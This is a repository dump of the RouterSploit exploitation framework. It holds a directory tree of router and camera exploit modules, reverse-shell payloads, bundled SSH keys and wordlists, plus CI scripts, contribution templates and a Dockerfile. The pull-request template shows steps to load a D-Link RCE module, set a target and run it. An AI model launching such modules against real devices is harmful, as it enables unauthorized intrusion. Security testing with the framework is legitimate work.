└── hg866_password_change.py │ │ │ ├── ipfire/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ipfire_oinkcode_rce.py │ │ │ │ ├── ipfire_proxy_rce.py │ │ │ │ └── ipfire_shellshock.py │ │ │ ├── lg/ │ │ │ │ ├── __init__.py │ │ │ │ └── nas_3718.py │ │ │ ├── linksys/ │ │ │ │ ├── 1500_2500_rce.py │ │ │ │ ├── __init__.py │ │ │ │ ├── eseries_themoon_rce.py │ │ │ │ ├── smartwifi_password_disclosure.py │ │ │ │ ├── wap54gv3_rce.py │ │ │ │ └── wrt100_110_rce.py │ │ │ ├── mikrotik/ │ │ │ │ ├── __init__.py │ │ │ │ ├── routeros_jailbreak.py │ │ │ │ └── winbox_auth_bypass_creds_disclosure.py │ │ │ ├── movistar/ │ │ │ │ ├── __init__.py │ │ │ │ └── adsl_router_bhs_rta_path_traversal.py │ │ │ ├── multi/ │ │ │ │ ├── __init__.py │ │ │ │ ├── gpon_home_gateway_rce.py │ │ │ │ ├── misfortune_cookie.py │ │ │ │ ├── rom0.py │ │ │ │ ├── tcp_32764_info_disclosure.py │ │ │ │ └── tcp_32764_rce.py │ │ │ ├── netcore/ │ │ │ │ ├── __init__.py │ │ │ │ └── udp_53413_rce.py │ │ │ ├── netgear/ │ │ │ │ ├── __init__.py │ │ │ │ ├── dgn2200_dnslookup_cgi_rce.py │ │ │ │ ├── dgn2200_ping_cgi_rce.py │ │ │ │ ├── jnr1010_path_traversal.py │ │ │ │ ├── multi_password_disclosure-2017-5521.py │ │ │ │ ├── multi_rce.py │ │ │ │ ├── n300_auth_bypass.py │ │ │ │ ├── prosafe_rce.py │ │ │ │ ├── r7000_r6400_rce.py │ │ │ │ ├── rax30_rce.py │ │ │ │ └── wnr500_612v3_jnr1010_2010_path_traversal.py │ │ │ ├── netsys/ │ │ │ │ ├── __init__.py │ │ │ │ └── multi_rce.py │ │ │ ├── shuttle/ │ │ │ │ ├── 915wm_dns_change.py │ │ │ │ └── __init__.py │ │ │ ├── technicolor/ │ │ │ │ ├── __init__.py │ │ │ │ ├── dwg855_authbypass.py │ │ │ │ ├── tc7200_password_disclosure.py │ │ │ │ ├── tc7200_password_disclosure_v2.py │ │ │ │ └── tg784_authbypass.py │ │ │ ├── thomson/ │ │ │ │ ├── __init__.py │ │ │ │ ├── twg849_info_disclosure.py │ │ │ │ └── twg850_password_disclosure.py │ │ │ ├── tplink/ │ │ │ │ ├── __init__.py │ │ │ │ ├── archer_c2_c20i_rce.py │ │ │ │ ├── archer_c9_admin_password_reset.py │ │ │ │ ├── wdr740nd_wdr740n_backdoor.py │ │ │ │ ├── wdr740nd_wdr740n_path_traversal.py │ │ │ │ └── wdr842nd_wdr842n_configure_disclosure.py │ │ │ ├── ubiquiti/ │ │ │ │ ├── __init__.py │ │ │ │ └── airos_6_x.py │ │ │ ├── zte/ │ │ │ │ ├── __init__.py │ │ │ │ ├── f460_f660_backdoor.py │ │ │ │ ├── zxhn_h108n_wifi_password_disclosure.py │ │ │ │ └── zxv10_rce.py │ │ │ └── zyxel/ │ │ │ ├── __init__.py │ │ │ ├── d1000_rce.py │ │ │ ├── d1000_wifi_password_disclosure.py │ │ │ ├── p660hn_t_v1_rce.py │ │ │ ├── p660hn_t_v2_rce.py │ │ │ └── zywall_usg_extract_hashes.py │ │ ├── generic/ │ │ │ ├── __init__.py │ │ │ ├── bluetooth/ │ │ │ │ ├── __init__.py │ │ │ │ ├── btle_enumerate.py │ │ │ │ ├── btle_scan.py │ │ │ │ └── btle_write.py │ │ │ └── upnp/ │ │ │ ├── __init__.py │ │ │ └── ssdp_msearch.py │ │ ├── payloads/ │ │ │ ├── __init__.py │ │ │ ├── armle/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── cmd/ │ │ │ │ ├── __init__.py │ │ │ │ ├── awk_bind_tcp.py │ │ │ │ ├── awk_bind_udp.py │ │ │ │ ├── awk_reverse_tcp.py │ │ │ │ ├── bash_reverse_tcp.py │ │ │ │ ├── netcat_bind_tcp.py │ │ │ │ ├── netcat_reverse_tcp.py │ │ │ │ ├── perl_bind_tcp.py │ │ │ │ ├── perl_reverse_tcp.py │ │ │ │ ├── php_bind_tcp.py │ │ │ │ ├── php_reverse_tcp.py │ │ │ │ ├── python_bind_tcp.py │ │ │ │ ├── python_bind_udp.py │ │ │ │ ├── python_reverse_tcp.py │ │ │ │ └── python_reverse_udp.py │ │ │ ├── mipsbe/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── mipsle/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── perl/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── php/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── python/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ ├── bind_udp.py │ │ │ │ ├── reverse_tcp.py │ │ │ │ └── reverse_udp.py │ │ │ ├── x64/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ └── x86/ │ │ │ ├── __init__.py │ │ │ ├── bind_tcp.py │ │ │ └── reverse_tcp.py │ │ └── scanners/ │ │ ├── __init__.py │ │ ├── autopwn.py │ │ ├── cameras/ │ │ │ ├── __init__.py │ │ │ └── camera_scan.py │ │ ├── misc/ │ │ │ ├── __init__.py │ │ │ └── misc_scan.py │ │ └── routers/ │ │ ├── __init__.py │ │ └── router_scan.py │ └── resources/ │ ├── __init__.py │ ├── ssh_keys/ │ │ ├── array-networks-vapv-vxag.json │ │ ├── array-networks-vapv-vxag.key │ │ ├── barracuda_load_balancer_vm.json │ │ ├── barracuda_load_balancer_vm.key │ │ ├── ceragon-fibeair-cve-2015-0936.json │ │ ├── ceragon-fibeair-cve-2015-0936.key │ │ ├── exagrid-cve-2016-1561.json │ │ ├── exagrid-cve-2016-1561.key │ │ ├── f5-bigip-cve-2012-1493.json │ │ ├── f5-bigip-cve-2012-1493.key │ │ ├── loadbalancer.org-enterprise-va.json │ │ ├── loadbalancer.org-enterprise-va.key │ │ ├── monroe-dasdec-cve-2013-0137.json │ │ ├── monroe-dasdec-cve-2013-0137.key │ │ ├── quantum-dxi-v1000.json │ │ ├── quantum-dxi-v1000.key │ │ ├── vagrant.json │ │ └── vagrant.key │ └── wordlists/ │ ├── __init__.py │ ├── defaults.txt │ ├── passwords.txt │ ├── snmp.txt │ └── usernames.txt ├── rsf.py ├── setup.py └── tests/ ├── __init__.py ├── conftest.py ├── core/ │ ├── __init__.py │ └── test_option.py ├── creds/ │ ├── __init__.py │ ├── cameras/ │ │ ├── __init__.py │ │ ├── acti/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_default_creds.py │ │ ├── american_dynamics/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── arecont/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── avigilon/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── avtech/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── axis/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_http_auth_default_creds.py │ │ ├── basler/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_default_creds.py │ │ ├── brickcom/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_http_auth_default_creds.py │ │ ├── canon/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_default_creds.py │ │ ├── cisco/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── dlink/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── geovision/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── grandstream/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── hikvision/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── honeywell/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── iqinvision/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── jvc/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── mobotix/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── samsung/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── sentry360/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── siemens/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── speco/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── stardot/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── vacron/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ └── videoiq/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── generic/ │ │ ├── test_ftp_bruteforce.py │ │ ├── test_ftp_default.py │ │ ├── test_http_basic_digest_bruteforce.py │ │ ├── test_http_basic_digest_default.py │ │ ├── test_snmp_bruteforce.py │ │ ├── test_ssh_bruteforce.py │ │ ├── test_ssh_default.py │ │ ├── test_telnet_bruteforce.py │ │ └── test_telnet_default.py │ └── routers/ │ ├── 2wire/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── 3com/ │ │ ├── __init__.py │ │ ├── test_3com_ftp_default_creds.py │ │ ├── test_3com_ssh_default_creds.py │ │ └── test_3com_telnet_default_creds.py │ ├── __init__.py │ ├── asmax/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ ├── test_telnet_default_creds.py │ │ └── test_webinterface_http_auth_default_creds.py │ ├── asus/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── belkin/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── bhu/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── billion/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── cisco/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── comtrend/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── dlink/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── fortinet/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── huawei/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── ipfire/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── juniper/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── linksys/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── mikrotik/ │ │ ├── __init__.py │ │ ├── test_api_ros_default_creds.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── movistar/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── netcore/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── netgear/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── netsys/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── pfsense/ │ │ ├── __init__.py │ │ └── test_ssh_default_creds.py │ ├── technicolor/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── thomson/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── tplink/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── ubiquiti/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── zte/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ └── zyxel/ │ ├── __init__.py │ ├── test_ftp_default_creds.py │ ├── test_ssh_default_creds.py │ └── test_telnet_default_creds.py ├── encoders/ │ ├── __init__.py │ ├── perl/ │ │ ├── __init__.py │ │ ├── test_base64.py │ │ └── test_hex.py │ ├── php/ │ │ ├── __init__.py │ │ ├── test_base64.py │ │ └── test_hex.py │ └── python/ │ ├── __init__.py │ ├── test_base64.py │ └── test_hex.py ├── exploits/ │ ├── __init__.py │ ├── cameras/ │ │ ├── __init__.py │ │ ├── avigilon/ │ │ │ ├── __init__.py │ │ │ └── test_videoiq_camera_path_traversal.py │ │ ├── brickcom/ │ │ │ ├── __init__.py │ │ │ ├── test_corp_network_cameras_conf_disclosure.py │ │ │ └── test_users_cgi_creds_disclosure.py │ │ ├── cisco/ │ │ │ ├── __init__.py │ │ │ └── test_video_surv_path_traversal.py │ │ ├── dlink/ │ │ │ ├── __init__.py │ │ │ └── test_dcs_930l_932l_auth_bypass.py │ │ ├── honeywell/ │ │ │ ├── __init__.py │ │ │ └── test_hicc_1100pt_password_disclosure.py │ │ ├── jovision/ │ │ │ ├── __init__.py │ │ │ └── test_jovision_camera_credential_disclosure.py │ │ ├── multi/ │ │ │ ├── __init__.py │ │ │ ├── test_cctv_dvr_rce.py │ │ │ ├── test_dvr_creds_disclosure.py │ │ │ ├── test_jvc_vanderbilt_honeywell_path_traversal.py │ │ │ └── test_netwave_ip_camera_information_disclosure.py │ │ ├── mvpower/ │ │ │ ├── __init__.py │ │ │ └── test_dvr_jaws_rce.py │ │ ├── siemens/ │ │ │ ├── __init__.py │ │ │ └── test_cvms2025_credentials_disclosure.py │ │ └── xiongmai/ │ │ ├── __init__.py │ │ └── test_uc_httpd_path_traversal.py │ ├── misc/ │ │ ├── __init__.py │ │ ├── asus/ │ │ │ └── test_b1m_projector_rce.py │ │ ├── miele/ │ │ │ ├── __init__.py │ │ │ └── test_pg8528_path_traversal.py │ │ └── wepresent/ │ │ ├── __init__.py │ │ └── test_wipg1000_rce.py │ └── routers/ │ ├── 2wire/ │ │ ├── __init__.py │ │ ├── test_4011g_5012nv_path_traversal.py │ │ └── test_gateway_auth_bypass.py │ ├── 3com/ │ │ ├── __init__.py │ │ ├── test_ap8760_password_disclosure.py │ │ ├── test_imc_info_disclosure.py │ │ ├── test_imc_path_traversal.py │ │ ├── test_officeconnect_info_disclosure.py │ │ └── test_officeconnect_rce.py │ ├── __init__.py │ ├── asmax/ │ │ ├── __init__.py │ │ ├── test_ar_1004g_password_disclosure.py │ │ └── test_ar_804_gu_rce.py │ ├── asus/ │ │ ├── __init__.py │ │ ├── test_asuswrt_lan_rce.py │ │ ├── test_infosvr_backdoor_rce.py │ │ └── test_rt_n16_password_disclosure.py │ ├── belkin/ │ │ ├── __init__.py │ │ ├── test_auth_bypass.py │ │ ├── test_g_n150_password_disclosure.py │ │ ├── test_g_plus_info_disclosure.py │ │ ├── test_n150_path_traversal.py │ │ ├── test_n750_rce.py │ │ └── test_play_mac_prce.py │ ├── bhu/ │ │ ├── __init__.py │ │ └── test_bhu_urouter_rce.py │ ├── billion/ │ │ ├── __init__.py │ │ ├── test_billion_5200w_rce.py │ │ └── test_billion_7700n4_password_disclosure.py │ ├── cisco/ │ │ ├── __init__.py │ │ ├── test_dpc2420_info_disclosure.py │ │ ├── test_firepower_management60_path_traversal.py │ │ ├── test_firepower_management60_rce.py │ │ ├── test_ios_http_authorization_bypass.py │ │ ├── test_rv320_command_injection.py │ │ ├── test_secure_acs_bypass.py │ │ ├── test_ucm_info_disclosure.py │ │ ├── test_ucs_manager_rce.py │ │ └── test_unified_multi_path_traversal.py │ ├── comtrend/ │ │ ├── __init__.py │ │ └── test_ct_5361t_password_disclosure.py │ ├── dlink/ │ │ ├── __init__.py │ │ ├── test_dcs_930l_auth_rce.py │ │ ├── test_dir_300_320_600_615_info_disclosure.py │ │ ├── test_dir_300_320_615_auth_bypass.py │ │ ├── test_dir_300_600_rce.py │ │ ├── test_dir_300_645_815_upnp_rce.py │ │ ├── test_dir_645_815_rce.py │ │ ├── test_dir_645_password_disclosure.py │ │ ├── test_dir_655_866_652_rce.py │ │ ├── test_dir_815_850l_rce.py │ │ ├── test_dir_825_path_traversal.py │ │ ├── test_dir_850l_creds_disclosure.py │ │ ├── test_dir_8xx_password_disclosure.py │ │ ├── test_dns_320l_327l_rce.py │ │ ├── test_dsl_2730_2750_path_traversal.py │ │ ├── test_dsl_2730b_2780b_526b_dns_change.py │ │ ├── test_dsl_2750b_info_disclosure.py │ │ ├── test_dsl_2750b_rce.py │ │ ├── test_dsp_w110_rce.py │ │ ├── test_dvg_n5402sp_path_traversal.py │ │ ├── test_dwl_3200ap_password_disclosure.py │ │ ├── test_dwr_932_info_disclosure.py │ │ ├── test_dwr_932b_backdoor.py │ │ ├── test_multi_hedwig_cgi_exec.py │ │ └── test_multi_hnap_rce.py │ ├── huawei/ │ │ ├── __init__.py │ │ ├── test_e5331_mifi_info_disclosure.py │ │ ├── test_hg520_info_disclosure.py │ │ ├── test_hg530_hg520b_password_disclosure.py │ │ └── test_hg866_password_change.py │ ├── ipfire/ │ │ ├── __init__.py │ │ ├── test_ipfire_proxy_rce.py │ │ └── test_ipfire_shellshock.py │ ├── linksys/ │ │ ├── __init__.py │ │ ├── test_1500_2500_rce.py │ │ ├── test_eseries_themoon_rce.py │ │ ├── test_smartwifi_password_disclosure.py │ │ ├── test_wap54gv3_rce.py │ │ └── test_wrt100_110_rce.py │ ├── mikrotik/ │ │ ├── __init__.py │ │ └── test_winbox_auth_bypass_creds_disclosure.py │ ├── movistar/ │ │ ├── __init__.py │ │ └── test_adsl_router_bhs_rta_path_traversal.py │ ├── multi/ │ │ ├── __init__.py │ │ ├── test_gpon_home_gateway_rce.py │ │ ├── test_misfortune_cookie.py │ │ ├── test_rom0.py │ │ ├── test_tcp_32764_info_disclosure.py │ │ └── test_tcp_32764_rce.py │ ├── netcore/ │ │ ├── __init__.py │ │ └── test_udp_53413_rce.py │ ├── netgear/ │ │ ├── __init__.py │ │ ├── test_dgn2200_ping_cgi_rce.py │ │ ├── test_jnr1010_path_traversal.py │ │ ├── test_n300_auth_bypass.py │ │ ├── test_netgear_multi_rce.py │ │ ├── test_prosafe_rce.py │ │ ├── test_r7000_r6400_rce.py │ │ └── test_wnr500_612v3_jnr1010_2010_path_traversal.py │ ├── netsys/ │ │ ├── __init__.py │ │ └── test_multi_rce.py │ ├── shuttle/ │ │ ├── __init__.py │ │ └── test_915wm_dns_change.py │ ├── technicolor/ │ │ ├── __init__.py │ │ ├── test_dwg855_authbypass.py │ │ ├── test_tc7200_password_disclosure.py │ │ ├── test_tc7200_password_disclosure_v2.py │ │ └── test_tg784_authbypass.py │ ├── thomson/ │ │ ├── __init__.py │ │ └── test_twg850_password_disclosure.py │ ├── tplink/ │ │ ├── __init__.py │ │ ├── test_archer_c2_c20i_rce.py │ │ ├── test_wdr740nd_wdr740n_backdoor.py │ │ ├── test_wdr740nd_wdr740n_path_traversal.py │ │ └── test_wdr842nd_wdr842n_configure_disclosure.py │ ├── zte/ │ │ ├── __init__.py │ │ ├── test_f460_f660_backdoor.py │ │ ├── test_zxhn_h108n_wifi_password_disclosure.py │ │ └── test_zxv10_rce.py │ └── zyxel/ │ ├── __init__.py │ ├── test_d1000_rce.py │ ├── test_d1000_wifi_password_disclosure.py │ ├── test_p660hn_t_v1_rce.py │ ├── test_p660hn_t_v2_rce.py │ └── test_zywall_usg_extract_hashes.py ├── generic/ │ ├── __init__.py │ └── upnp/ │ └── test_ssdp_msearch.py ├── payloads/ │ ├── __init__.py │ ├── armle/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── cmd/ │ │ ├── __init__.py │ │ ├── test_awk_bind_tcp.py │ │ ├── test_awk_bind_udp.py │ │ ├── test_awk_reverse_tcp.py │ │ ├── test_bash_reverse_tcp.py │ │ ├── test_netcat_bind_tcp.py │ │ ├── test_netcat_reverse_tcp.py │ │ ├── test_perl_bind_tcp.py │ │ ├── test_perl_reverse_tcp.py │ │ ├── test_php_bind_tcp.py │ │ ├── test_php_reverse_tcp.py │ │ ├── test_python_bind_tcp.py │ │ ├── test_python_bind_udp.py │ │ ├── test_python_reverse_tcp.py │ │ └── test_python_reverse_udp.py │ ├── mipsbe/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── mipsle/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── perl/ │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── php/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── python/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ ├── test_bind_udp.py │ │ ├── test_reverse_tcp.py │ │ └── test_reverse_udp.py │ ├── x64/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ └── x86/ │ ├── __init__.py │ ├── test_bind_tcp.py │ └── test_reverse_tcp.py ├── test_exploit_scenarios.py └── test_module_info.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: .dockerignore ================================================ .idea/ .travis/ README.md LICENSE .travis.yml *.pyc *.log ================================================ FILE: .github/ISSUE_TEMPLATE.md ================================================ ! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ! ## Steps to Reproduce (for bugs) 1. 2. 3. 4. ## Your Environment * RouterSploit Version used: * Operating System and version: * Python Version: ( `python3 --version` ) * Python Environment: ( `python3 -m pip freeze` ) ## Current Behavior * If describing a bug, tell us what happens instead of the expected behavior * If suggesting a change/improvement, tell us how it works right now ## Expected Behavior * If you're describing a bug, tell us what should happen * If you're suggesting a change/improvement, tell us how it should work ================================================ FILE: .github/PULL_REQUEST_TEMPLATE.md ================================================ ## Status **READY/IN DEVELOPMENT/HOLD** ## Description Describe what is changed by your Pull Request. If this PR is related to the open issue (bug/feature/new module) please attach issue number. ## Verification Provide steps to test or reproduce the PR. 1. Start `./rsf.py` 2. `use exploits/routers/dlink/dsl_2750b_rce` 3. `set target 192.168.1.1` 4. `run` 5. ... ## Checklist - [ ] Write module/feature - [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py)) - [ ] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md)) ================================================ FILE: .gitignore ================================================ # IntelliJ project files .idea out gen # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # C extensions *.so # Distribution / packaging .Python env/ build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ lib64/ parts/ sdist/ var/ *.egg-info/ .installed.cfg *.egg # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. *.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .coverage .coverage.* .cache .pytest_cache nosetests.xml coverage.xml *,cover # Translations *.mo *.pot # Django stuff: *.log # Sphinx documentation docs/_build/ # PyBuilder target/ # VS Code .vscode # virtualenv venv/ # macOS .DS_Store .DS_Store? # vim *.swp *.swo # Pipenv files Pipfile Pipfile.lock ================================================ FILE: .travis/install.sh ================================================ #!/bin/bash set -e set -x if [[ "$(uname -s)" == 'Darwin' ]]; then sw_vers git clone --depth 1 https://github.com/yyuu/pyenv.git ~/.pyenv PYENV_ROOT="$HOME/.pyenv" PATH="$PYENV_ROOT/bin:$PATH" eval "$(pyenv init -)" pyenv install $PYTHON_VERSION pyenv global $PYTHON_VERSION pyenv rehash pip install --user virtualenv python -m virtualenv ~/.venv source ~/.venv/bin/activate fi python -m pip install --upgrade pip python -m pip install -r requirements-dev.txt ================================================ FILE: .travis/run.sh ================================================ #!/bin/bash set -e set -x if [[ "$(uname -s)" == "Darwin" ]]; then PYENV_ROOT="$HOME/.pyenv" PATH="$PYENV_ROOT/bin:$PATH" eval "$(pyenv init -)" source ~/.venv/bin/activate fi make lint tests ================================================ FILE: .travis.yml ================================================ language: python matrix: include: - os: linux python: 3.6 - os: osx language: generic env: PYTHON_VERSION=3.6.1 install: - "./.travis/install.sh" script: - "./.travis/run.sh" ================================================ FILE: CONTRIBUTING.md ================================================ # Contribution Guidelines There are many ways to contribute to RouterSploit project, and the routersploit team is grateful for all contributions. This overview summarizes the most important steps to get you started as a contributor. * Report bugs to the routersploit issue tracker. * Make suggestions for changes, updates, or new features to the routersploit issue tracker. * Contribute bug fixes, example code, documentation, or tutorials to routersploit. * Contribute new features to routersploit. ## Bug reports When submitting bug reports, please consider providing the following information: * Reproduction steps: step by step description to reproduce the problem. * Expected: Describe the behavior you expect. * Actual: Describe the behavior you see. ## Testing It is hard to test modules in all possible scenarios. If you would like to help: 1. Check what device you have - identify vendor and version. 2. Check if routersploit contains exploits for the device you posses. 3. If exploit does not work but it should, check "show info" for more information. References should provide you with links to proof of concept exploits. Example: ``` References: - https://www.exploit-db.com/exploits/24975/ ``` 4. Try to use proof of concept exploit and check if it works properly. If it does, feel free to create new issue bug with explanation that the routersploit's module does not work properly. ## Development * [Creating exploit module](https://github.com/reverse-shell/routersploit/wiki/Creating-Exploit) * [Creating creds module](https://github.com/reverse-shell/routersploit/wiki/Creating-Creds) * [Creating scanner module](https://github.com/reverse-shell/routersploit/wiki/Creating-Scanner) ================================================ FILE: Dockerfile ================================================ FROM python:3.9-bookworm WORKDIR /routersploit RUN useradd rts -U -m && \ chown -R rts:rts /routersploit USER rts COPY requirements.txt . RUN pip install --user --no-cache-dir -r requirements.txt COPY routersploit 